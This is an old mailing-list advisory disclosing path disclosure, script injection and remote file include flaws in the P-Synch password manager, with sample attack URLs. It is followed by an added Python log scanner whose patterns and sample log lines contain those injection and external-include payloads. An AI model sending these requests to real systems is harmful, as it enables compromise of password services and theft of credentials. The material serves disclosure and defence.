Multiple Vulnerabilities In P-Synch Password Management

From: JeiAr (jeiarkmfms.com)
Date: Thu May 29 2003 - 00:26:21 CDT


Multiple Vulnerabilities In P-Synch Password Management
-------------------------------------------------------
The other night I came across a server running P-Synch.
I had never heard of it so I was curious to poke around
on it a bit. Within an hour I found the vulns listed below.
I'm pretty sure there are other more serious vulns in
P-Synch, but they are very picky about who they give their
software to, even an evaluation version. So I was not able
to test any further. However I encourage any admins running
P-Synch to poke around on it, just to be on the safe side.

Description
-------------------------------------------------------
P-Synch Total Password Management Solution
by M-TECH

P-Synch is a total password management solution. It is
intended to reduce the cost of ownership of password systems,
and simultaneously improve the security of password protected
systems. This is done through:

- Password Synchronization.
- Enforcing an enterprise wide password strength policy.
- Allowing authenticated users to reset their own forgotten
  passwords and enable their locked out accounts.
- Streamlining help desk call resolution for password resets.

P-Synch is available for both internal use, on the corporate
Intranet, as well as for the Internet deployment in B2B and
B2C applications.

http://www.securityfocus.com/products/837

Problems
-------------------------------------------------------
All of these problems are simple, self-explanatory vulns,
so I'm sure the below examples will speak for themselves.
Once again this application was NOT thoroughly researched.
So anyone with a copy of P-Synch might wanna explore it
further.

Path Disclosure Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=

Code Injection Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]

File Include Vulnerability
-------------------------------------------------------
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file

Credits
-------------------------------------------------------
All credits go to JeiAr of GulfTech Computers and CSA
Security Research http://www.gulftech.org
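
Added example (not part of the original post and not P-Synch code): a log check that flags the three request patterns listed above, for admins reviewing web server logs of a P-Synch host. Only the CGI names and the lang/css parameters come from the advisory; the log layout, the sample lines and the lang=en-us value are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# CGI names and parameters are taken from the advisory; the log layout
# (a quoted "METHOD URI PROTOCOL" request field) is an assumption.
CGI_NAMES = {"nph-psa.exe", "nph-psf.exe"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(uri):
    """Return the advisory findings that a request URI matches."""
    parts = urlsplit(uri)
    if parts.path.rsplit("/", 1)[-1].lower() not in CGI_NAMES:
        return []
    # parse_qs percent-decodes values; keep_blank_values keeps "lang=".
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if any(v == "" for v in params.get("lang", [])):
        findings.append("path-disclosure: empty lang")
    for value in params.get("css", []):
        if re.search(r'["\'<>]', value):
            findings.append("injection: markup characters in css")
        # Absolute (scheme://) or protocol-relative (//host) stylesheet URL.
        if re.match(r"(?i)\s*(?:[a-z][a-z0-9+.-]*:)?//", value):
            findings.append("include: external URL in css")
    return findings

def scan(lines):
    """Yield (line_number, findings) for log lines that match."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            yield number, findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2003:00:10:01 -0500] "GET /psynch/nph-psa.exe?lang=en-us HTTP/1.0" 200 5120',
    '192.0.2.44 - - [29/May/2003:00:11:15 -0500] "GET /psynch/nph-psf.exe?lang= HTTP/1.0" 200 812',
    '192.0.2.44 - - [29/May/2003:00:12:40 -0500] "GET /psynch/nph-psa.exe?css=%22%3E%3Cscript%3E HTTP/1.0" 200 5301',
    '192.0.2.44 - - [29/May/2003:00:13:02 -0500] "GET /psynch/nph-psf.exe?css=http://example.test/x.css HTTP/1.0" 200 5290',
    '192.0.2.10 - - [29/May/2003:00:14:09 -0500] "GET /index.html?css=http://example.test/x.css HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, "; ".join(findings))
```

The last sample line is ignored because the request is not for one of the two CGI programs named in the advisory.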